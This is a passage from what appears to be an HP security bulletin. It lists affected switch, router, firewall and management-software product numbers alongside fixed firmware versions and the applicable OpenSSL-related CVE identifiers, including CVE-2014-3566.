EI Swch\nJG975A HP 5130-24G-4SFP+ EI BR Switch\nJG976A HP 5130-48G-4SFP+ EI BR Switch\nJG977A HP 5130-24G-PoE+-4SFP+ EI BR Swch\nJG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\n5120 EI Switch Series\n R2221P08\n JE066A HP 5120-24G EI Switch\nJE067A HP 5120-48G EI Switch\nJE068A HP 5120-24G EI Switch with 2 Slots\nJE069A HP 5120-48G EI Switch with 2 Slots\nJE070A HP 5120-24G-PoE EI Switch with 2 Slots\nJE071A HP 5120-48G-PoE EI Switch with 2 Slots\nJG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts\nJG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts\nJG245A HP 5120-24G EI TAA Switch w 2 Intf Slts\nJG246A HP 5120-48G EI TAA Switch w 2 Intf Slts\nJG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts\nJG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts\n H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ)\nH3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS)\nH3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR)\nH3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT)\nH3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU)\nH3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)\n\n CVE-2014-3566\nCVE-2014-3568\n\n5120 SI switch Series\n R1513P95\n JE072A HP 5120-48G SI Switch\nJE073A HP 5120-16G SI Switch\nJE074A HP 5120-24G SI Switch\nJG091A HP 5120-24G-PoE+ (370W) SI Switch\nJG092A HP 5120-24G-PoE+ (170W) SI Switch\n H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W)\nH3C S5120-20P-SI L2\n16GE Plus 4SFP (0235A42B)\nH3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D)\nH3C S5120-28P-HPWR-SI (0235A0E5)\nH3C S5120-28P-PWR-SI (0235A0E3)\n\n CVE-2014-3566\nCVE-2014-3568\n\n4800 G Switch Series\n R2221P08\n JD007A HP 4800-24G Switch\nJD008A HP 4800-24G-PoE Switch\nJD009A HP 4800-24G-SFP Switch\nJD010A HP 4800-48G Switch\nJD011A HP 4800-48G-PoE Switch\n\n 3Com Switch 4800G 24-Port (3CRS48G-24-91)\n3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91)\n3Com Switch 4800G 48-Port (3CRS48G-48-91)\n3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91)\n3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)\n CVE-2014-3566\nCVE-2014-3568\n\n4510G Switch Series\n R2221P08\n JF428A HP 4510-48G Switch\nJF847A HP 4510-24G Switch\n\n 3Com Switch 4510G 48 Port (3CRS45G-48-91)\n3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91)\n3Com Switch E4510-24G (3CRS45G-24-91)\n CVE-2014-3566\nCVE-2014-3568\n\n4210G Switch Series\n R2221P08\n JF844A HP 4210-24G Switch\nJF845A HP 4210-48G Switch\nJF846A HP 4210-24G-PoE Switch\n\n 3Com Switch 4210-24G (3CRS42G-24-91)\n3Com Switch 4210-48G (3CRS42G-48-91)\n3Com Switch E4210-24G-PoE (3CRS42G-24P-91)\n CVE-2014-3566\nCVE-2014-3568\n\n3610 Switch Series\n R5319P10\n JD335A HP 3610-48 Switch\nJD336A HP 3610-24-4G-SFP Switch\nJD337A HP 3610-24-2G-2G-SFP Switch\nJD338A HP 3610-24-SFP Switch\n H3C S3610-52P - model LS-3610-52P-OVS (0235A22C)\nH3C S3610-28P - model LS-3610-28P-OVS (0235A22D)\nH3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E)\nH3C S3610-28F - model LS-3610-28F-OVS (0235A22F)\n\n CVE-2014-3566\nCVE-2014-3568\n\n3600 V2 Switch Series\n R2110P03\n JG299A HP 3600-24 v2 EI Switch\nJG300A HP 3600-48 v2 EI Switch\nJG301A HP 3600-24-PoE+ v2 EI Switch\nJG301B HP 3600-24-PoE+ v2 EI Switch\nJG302A HP 3600-48-PoE+ v2 EI Switch\nJG302B HP 3600-48-PoE+ v2 EI Switch\nJG303A HP 3600-24-SFP v2 EI Switch\nJG304A HP 3600-24 v2 SI Switch\nJG305A HP 3600-48 v2 SI Switch\nJG306A HP 3600-24-PoE+ v2 SI Switch\nJG306B HP 3600-24-PoE+ v2 SI Switch\nJG307A HP 3600-48-PoE+ v2 SI Switch\nJG307B HP 3600-48-PoE+ v2 SI Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n3100V2\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch\nJD318B HP 3100-8 v2 EI Switch\nJD319B HP 3100-16 v2 EI Switch\nJD320B HP 3100-24 v2 EI Switch\nJG221A HP 3100-8 v2 SI Switch\nJG222A HP 3100-16 v2 SI Switch\nJG223A HP 3100-24 v2 SI Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n3100V2-48\n R2110P03\n JG315A HP 3100-48 v2 Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1920\n R1105\n JG920A HP 1920-8G Switch\nJG921A HP 1920-8G-PoE+ (65W) Switch\nJG922A HP 1920-8G-PoE+ (180W) Switch\nJG923A HP 1920-16G Switch\nJG924A HP 1920-24G Switch\nJG925A HP 1920-24G-PoE+ (180W) Switch\nJG926A HP 1920-24G-PoE+ (370W) Switch\nJG927A HP 1920-48G Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1910 R11XX\n R1107\n JG536A HP 1910-8 Switch\nJG537A HP 1910-8 -PoE+ Switch\nJG538A HP 1910-24 Switch\nJG539A HP 1910-24-PoE+ Switch\nJG540A HP 1910-48 Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1910 R15XX\n R1513P95\n JE005A HP 1910-16G Switch\nJE006A HP 1910-24G Switch\nJE007A HP 1910-24G-PoE (365W) Switch\nJE008A HP 1910-24G-PoE(170W) Switch\nJE009A HP 1910-48G Switch\nJG348A HP 1910-8G Switch\nJG349A HP 1910-8G-PoE+ (65W) Switch\nJG350A HP 1910-8G-PoE+ (180W) Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\n1620\n R1104\n JG912A HP 1620-8G Switch\nJG913A HP 1620-24G Switch\nJG914A HP 1620-48G Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20-1X\n R2513P33\n JD431A HP MSR20-10 Router\nJD667A HP MSR20-15 IW Multi-Service Router\nJD668A HP MSR20-13 Multi-Service Router\nJD669A HP MSR20-13 W Multi-Service Router\nJD670A HP MSR20-15 A Multi-Service Router\nJD671A HP MSR20-15 AW Multi-Service Router\nJD672A HP MSR20-15 I Multi-Service Router\nJD673A HP MSR20-11 Multi-Service Router\nJD674A HP MSR20-12 Multi-Service Router\nJD675A HP MSR20-12 W Multi-Service Router\nJD676A HP MSR20-12 T1 Multi-Service Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\nJG209A HP MSR20-12-T-W Router (NA)\nJG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\nH3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-11 (0235A31V)\nH3C MSR 20-12 (0235A32E)\nH3C MSR 20-12 T1 (0235A32B)\nH3C MSR 20-13 (0235A31W)\nH3C MSR 20-13 W (0235A31X)\nH3C MSR 20-15 A (0235A31Q)\nH3C MSR 20-15 A W (0235A31R)\nH3C MSR 20-15 I (0235A31N)\nH3C MSR 20-15 IW (0235A31P)\nH3C MSR20-12 W (0235A32G)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30\n R2513P33\n JD654A HP MSR30-60 POE Multi-Service Router\nJD657A HP MSR30-40 Multi-Service Router\nJD658A HP MSR30-60 Multi-Service Router\nJD660A HP MSR30-20 POE Multi-Service Router\nJD661A HP MSR30-40 POE Multi-Service Router\nJD666A HP MSR30-20 Multi-Service Router\nJF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF232A HP RT-MSR3040-AC-OVS-AS-H3\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S)\nH3C MSR 30-20 (0235A19L)\nH3C MSR 30-20 POE (0235A239)\nH3C MSR 30-40 (0235A20J)\nH3C MSR 30-40 POE (0235A25R)\nH3C MSR 30-60 (0235A20K)\nH3C MSR 30-60 POE (0235A25S)\nH3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-16\n R2513P33\n JD659A HP MSR30-16 POE Multi-Service Router\nJD665A HP MSR30-16 Multi-Service Router\nJF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\nH3C MSR 30-16 (0235A237)\nH3C MSR 30-16 POE (0235A238)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-1X\n R2513P33\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\nH3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50\n R2513P33\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50-G2\n R2513P33\n JD429A HP MSR50 G2 Processor Module\nJD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q)\nH3C MSR 50 High Performance Main Processing Unit 3GE (Combo)\n256F/1GD(0231A0KL)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20 Russian version\n MSR201X_5.20.R2513L40.RU\n JD663B HP MSR20-21 Router\nJF228A HP MSR20-40 Router\nJF283A HP MSR20-20 Router\n H3C RT-MSR2020-AC-OVS-H3C (0235A324)\nH3C RT-MSR2040-AC-OVS-H3 (0235A326)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR20-1X Russian version\n MSR201X_5.20.R2513L40.RU\n JD431A HP MSR20-10 Router\nJF236A HP MSR20-15-I Router\nJF237A HP MSR20-15-A Router\nJF238A HP MSR20-15-I-W Router\nJF239A HP MSR20-11 Router\nJF240A HP MSR20-13 Router\nJF241A HP MSR20-12 Router\nJF806A HP MSR20-12-T Router\nJF807A HP MSR20-12-W Router\nJF808A HP MSR20-13-W Router\nJF809A HP MSR20-15-A-W Router\nJF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7)\nH3C RT-MSR2015-AC-OVS-I-H3 (0235A394)\nH3C RT-MSR2015-AC-OVS-A-H3 (0235A392)\nH3C RT-MSR2015-AC-OVS-AW-H3 (0235A393)\nH3C RT-MSR2011-AC-OVS-H3 (0235A395)\nH3C RT-MSR2013-AC-OVS-H3 (0235A390)\nH3C RT-MSR2012-AC-OVS-H3 (0235A396)\nH3C RT-MSR2012-T-AC-OVS-H3 (0235A398)\nH3C RT-MSR2012-AC-OVS-W-H3 (0235A397)\nH3C RT-MSR2013-AC-OVS-W-H3 (0235A391)\nH3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V)\nH3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30 Russian version\n MSR201X_5.20.R2513L40.RU\n JF229A HP MSR30-40 Router\nJF230A HP MSR30-60 Router\nJF235A HP MSR30-20 DC Router\nJF284A HP MSR30-20 Router\nJF287A HP MSR30-40 DC Router\nJF801A HP MSR30-60 DC Router\nJF802A HP MSR30-20 PoE Router\nJF803A HP MSR30-40 PoE Router\nJF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299)\nH3C RT-MSR3060-AC-OVS-H3 (0235A320)\nH3C RT-MSR3020-DC-OVS-H3 (0235A267)\nH3C MSR 30-20 Router (0235A328)\nH3C MSR 30-40 Router Host(DC) (0235A268)\nH3C RT-MSR3060-DC-OVS-H3 (0235A269)\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322)\nH3C RT-MSR3040-AC-POE-OVS-H3 (0235A323)\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-16 Russian version\n MSR201X_5.20.R2513L40.RU\n JF233A HP MSR30-16 Router\nJF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327)\nH3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR30-1X Russian version\n MSR201X_5.20.R2513L40.RU\n JF800A HP MSR30-11 Router\nJF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr\nJG182A HP MSR30-11E Router\nJG183A HP MSR30-11F Router\nJG184A HP MSR30-10 DC Router\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\nH3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50 Russian version\n MSR201X_5.20.R2513L40.RU\n JD433A HP MSR50-40 Router\nJD653A HP MSR50 Processor Module\nJD655A HP MSR50-40 Multi-Service Router\nJD656A HP MSR50-60 Multi-Service Router\nJF231A HP MSR50-60 Router\nJF285A HP MSR50-40 DC Router\nJF640A HP MSR50-60 Rtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297)\nH3C MSR 50 Processor Module (0231A791)\nH3C MSR 50-40 Chassis (0235A20N)\nH3C MSR 50-60 Chassis (0235A20L)\nH3C RT-MSR5060-AC-OVS-H3 (0235A298)\nH3C MSR5040-DC-OVS-H3C (0235A20P)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR50 G2 Russian version\n MSR201X_5.20.R2513L40.RU\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR9XX\n R2513P33\n JF812A HP MSR900 Router\nJF813A HP MSR920 Router\nJF814A HP MSR900-W Router\nJF815A HP MSR920 2FEWAN/8FELAN/.11b/g Rtr\nJG207A HP MSR900-W Router (NA)\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2)\nH3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX)\nH3C MSR 920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4)\nH3C MSR 920 Router 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR93X\n R2513P33\n JG512A HP MSR930 Wireless Router\nJG513A HP MSR930 3G Router\nJG514A HP MSR931 Router\nJG515A HP MSR931 3G Router\nJG516A HP MSR933 Router\nJG517A HP MSR933 3G Router\nJG518A HP MSR935 Router\nJG519A HP MSR935 Wireless Router\nJG520A HP MSR935 3G Router\nJG531A HP MSR931 Dual 3G Router\nJG596A HP MSR930 4G LTE/3G CDMA Router\nJG597A HP MSR936 Wireless Router\nJG665A HP MSR930 4G LTE/3G WCDMA Global Router\nJG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR1000\n R2513P33\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR1000 Russian version\n R2513L40.RU\n JG732A HP MSR1003-8 AC Router\n\n CVE-2014-3566\nCVE-2014-3568\n\nMSR2000\n R0106P18\n JG411A HP MSR2003 AC Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nMSR3000\n R0106P18\n JG404A HP MSR3064 Router\nJG405A HP MSR3044 Router\nJG406A HP MSR3024 AC Router\nJG409A HP MSR3012 AC Router\nJG861A HP MSR3024 TAA-compliant AC Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nMSR4000\n R0106P18\n JG402A HP MSR4080 Router Chassis\nJG403A HP MSR4060 Router Chassis\nJG412A HP MSR4000 MPU-100 Main Processing Unit\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nF5000\n F3210P22\n JG216A HP F5000 Firewall Standalone Chassis\nJD259A HP A5000-A5 VPN Firewall Chassis\n H3C SecPath F5000-A5 Host System (0150A0AG)\n\n CVE-2014-3566\nCVE-2014-3568\n\nF5000-C\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF5000-S\n R3811P03\n JG370A HP F5000-S VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nU200S and CS\n F5123P30\n JD268A HP 200-CS UTM Appliance\nJD273A HP U200-S UTM Appliance\n H3C SecPath U200-S (0235A36N)\n\n CVE-2014-3566\nCVE-2014-3568\n\nU200A and M\n F5123P30\n JD274A HP 200-M UTM Appliance\nJD275A HP U200-A UTM Appliance\n H3C SecPath U200-A (0235A36Q)\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade III\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module\nJG372A HP 10500/11900/7500 20Gbps VPN FW Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade FW\n R3181P05\n JC635A HP 12500 VPN Firewall Module\nJD245A HP 9500 VPN Firewall Module\nJD249A HP 10500/7500 Advanced VPN Firewall Mod\nJD250A HP 6600 Firewall Processing Rtr Module\nJD251A HP 8800 Firewall Processing Module\nJD255A HP 5820 VPN Firewall Module\n H3C S9500E SecBlade VPN Firewall Module (0231A0AV)\nH3C S7500E SecBlade VPN Firewall Module (0231A832)\nH3C SR66 Gigabit Firewall Module (0231A88A)\nH3C SR88 Firewall Processing Module (0231A88L)\nH3C S5820 SecBlade VPN Firewall Module (0231A94J)\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-E\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-A\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nF1000-S\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\n CVE-2014-3566\nCVE-2014-3568\n\nSecBlade SSL VPN\n Fix in Progress\nUse Mitigation\n JD253A HP 10500/7500 SSL VPN Mod w 500-user Lic\n\n CVE-2014-3566\nCVE-2014-3568\n\nVSR1000\n R0204P01\n JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software\nJG811AAE HP VSR1001 Comware 7 Virtual Services Router\nJG812AAE HP VSR1004 Comware 7 Virtual Services Router\nJG813AAE HP VSR1008 Comware 7 Virtual Services Router\n\n CVE-2014-3566\nCVE-2014-3567\nCVE-2014-3568\n\nWX5002/5004\n R2507P34\n JD441A HP 5800 ACM for 64-256 APs\nJD447B HP WX5002 Access Controller\nJD448A HP A-WX5004 Access Controller\nJD448B HP WX5004 Access Controller\nJD469A HP A-WX5004 (3Com) Access Controller\nJG261A HP 5800 Access Controller OAA TAA Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 850/870\n R2607P34\n JG723A HP 870 Unified Wired-WLAN Appliance\nJG725A HP 870 Unifd Wrd-WLAN TAA Applnc\nJG722A HP 850 Unified Wired-WLAN Appliance\nJG724A HP 850 Unifd Wrd-WLAN TAA Applnc\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 830\n R3507P34\n JG640A HP 830 24P PoE+ Unifd Wired-WLAN Swch\nJG641A HP 830 8P PoE+ Unifd Wired-WLAN Swch\nJG646A HP 830 24-Port PoE+ Wrd-WLAN TAA Switch\nJG647A HP 830 8-Port PoE+ Wrd-WLAN TAA Switch\n\n CVE-2014-3566\nCVE-2014-3568\n\nHP 6000\n R2507P34\n JG639A HP 10500/7500 20G Unified Wired-WLAN Mod\nJG645A HP 10500/7500 20G Unifd Wrd-WLAN TAA Mod\n\n CVE-2014-3566\nCVE-2014-3568\n\nVCX\n Fix in Progress\nUse Mitigation\n J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\nJ9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\nJC517A HP VCX V7205 Platform w/DL 360 G6 Server\nJE355A HP VCX V6000 Branch Platform 9.0\nJC516A HP VCX V7005 Platform w/DL 120 G6 Server\nJC518A HP VCX Connect 200 Primry 120 G6 Server\nJ9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\nJE341A HP VCX Connect 100 Secondary\nJE252A HP VCX Connect Primary MIM Module\nJE253A HP VCX Connect Secondary MIM Module\nJE254A HP VCX Branch MIM Module\nJE355A HP VCX V6000 Branch Platform 9.0\nJD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\nJD023A HP MSR30-40 Router with VCX MIM Module\nJD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\nJD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\nJD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\nJD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\nJD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\nJE340A HP VCX Connect 100 Pri Server 9.0\nJE342A HP VCX Connect 100 Sec Server 9.0\n\n CVE-2014-3566\nCVE-2014-3568\n\niMC PLAT\n iMC PLAT v7.1 E0303P06\n JD125A HP IMC Std S/W Platform w/100-node\nJD126A HP IMC Ent S/W Platform w/100-node\nJD808A HP IMC Ent Platform w/100-node License\nJD815A HP IMC Std Platform w/100-node License\nJF377A HP IMC Std S/W Platform w/100-node Lic\nJF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\nJF378A HP IMC Ent S/W Platform w/200-node Lic\nJF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\nJG546AAE HP IMC Basic SW Platform w/50-node E-LTU\nJG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\nJG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\nJG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU\nJG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\nJG659AAE HP IMC Smart Connect VAE E-LTU\nJG660AAE HP IMC Smart Connect w/WLM VAE E-LTU\nJG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\nJG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\nJG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU\nJG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU\nJG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n\n CVE-2014-3566\n\niMC UAM\n iMC UAM v7.1 E0302P07\n JD144A HP IMC UAM S/W Module w/200-User License\nJF388A HP IMC UAM S/W Module w/200-user License\nJF388AAE HP IMC UAM S/W Module w/200-user E-LTU\nJG752AAE HP IMC UAM SW Mod w/ 50-user E-LTU\n\n CVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\n\niMC WSM\n Fix in Progress\nUse Mitigation\n JD456A HP WSM Plug-in for IMC\nIncludes 50 Aps\nJF414A HP IMC WSM S/W Module with 50-AP License\nJF414AAE HP IMC WSM S/W Module with 50-AP E-LTU\nJG551AAE HP PMM to IMC WSM Upgr w/250 AP E-LTU\nJG769AAE HP PMM to IMC WSM Upg w/ 250-node E-LTU\n\n CVE-2014-3513\nCVE-2014-3566\nCVE-2014-3567\n\nA\n Fixes in progress\nuse mitigations\n J9565A HP 2615-8-PoE Switch\nJ9562A HP 2915-8G-PoE Switch\n\nE\n Fixes in progress\nuse mitigations\n J4850A HP ProCurve Switch 5304xl\nJ8166A HP ProCurve Switch 5304xl-32G\nJ4819A HP ProCurve Switch 5308xl\nJ8167A HP ProCurve Switch 5308xl-48G\nJ4849A HP ProCurve Switch 5348xl\nJ4849B HP ProCurve Switch 5348xl\nJ4848A HP ProCurve Switch 5372xl\nJ4848B HP ProCurve Switch 5372xl\n\nF\n Fixes in progress\nuse mitigations\n J4812A HP ProCurve 2512 Switch\nJ4813A HP ProCurve 2524 Switch\nJ4817A HP ProCurve 2312 Switch\nJ4818A HP ProCurve 2324 Switch\n\nH.07\n Fixes in progress\nuse mitigations\n J4902A HP ProCurve 6108 Switch\n\nH.10\n Fixes in progress\nuse mitigations\n J8762A HP E2600-8-PoE Switch\nJ4900A HP PROCURVE SWITCH 2626\nJ4900B HP ProCurve Switch 2626\nJ4900C ProCurve Switch 2626\nJ4899A HP ProCurve Switch 2650\nJ4899B HP ProCurve Switch 2650\nJ4899C ProCurve Switch 2650\nJ8164A ProCurve Switch 2626-PWR\nJ8165A HP ProCurve Switch 2650-PWR\n\ni.10\n Fixes in progress\nuse mitigations\n J4903A ProCurve Switch 2824\nJ4904A HP ProCurve Switch 2848\n\nJ\n Fixes in progress\nuse mitigations\n J9299A HP 2520-24G-PoE Switch\nJ9298A HP 2520-8G-PoE Switch\n\nK\n Fixes in progress\nuse mitigations\n J8692A HP 3500-24G-PoE yl Switch\nJ8693A HP 3500-48G-PoE yl Switch\nJ9310A HP 3500-24G-PoE+ yl Switch\nJ9311A HP 3500-48G-PoE+ yl Switch\nJ9470A HP 3500-24 Switch\nJ9471A HP 3500-24-PoE Switch\nJ9472A HP 3500-48 Switch\nJ9473A HP 3500-48-PoE Switch\nJ8697A HP E5406 zl Switch Chassis\nJ8699A HP 5406-48G zl Switch\nJ9447A HP 5406-44G-PoE+-4SFP zl Switch\nJ9533A HP 5406-44G-PoE+-2XG v2 zl Swch w Pm SW\nJ9539A HP 5406-44G-PoE+-4G v2 zl Swch w Prm SW\nJ9642A HP 5406 zl Switch with Premium Software\nJ9866A HP 5406 8p10GT 8p10GE Swch and Psw\nJ8698A HP E5412 zl Switch Chassis\nJ8700A HP 5412-96G zl Switch\nJ9448A HP 5412-92G-PoE+-4SFP zl Switch\nJ9532A HP 5412-92G-PoE+-2XG v2 zl Swch w Pm SW\nJ9540A HP 5412-92G-PoE+-4G v2 zl Swch w Prm SW\nJ9643A HP 5412 zl Switch with Premium Software\nJ8992A HP 6200-24G-mGBIC yl Switch\nJ9263A HP E6600-24G Switch\nJ9264A HP 6600-24G-4XG Switch\nJ9265A HP 6600-24XG Switch\nJ9451A HP E6600-48G Switch\nJ9452A HP 6600-48G-4XG Switch\nJ9475A HP E8206 zl Switch Base System\nJ9638A HP 8206-44G-PoE+-2XG v2 zl Swch w Pm SW\nJ9640A HP 8206 zl Switch w/Premium Software\nJ8715A ProCurve Switch 8212zl Base System\nJ8715B HP E8212 zl Switch Base System\nJ9091A ProCurve Switch 8212zl Chassis\u0026Fan Tray\nJ9639A HP 8212-92G-PoE+-2XG v2 zl Swch w Pm SW\nJ9641A HP 8212 zl Switch with Premium SW\n\nKA\n Fixes in progress\nuse mitigations\n J9573A HP 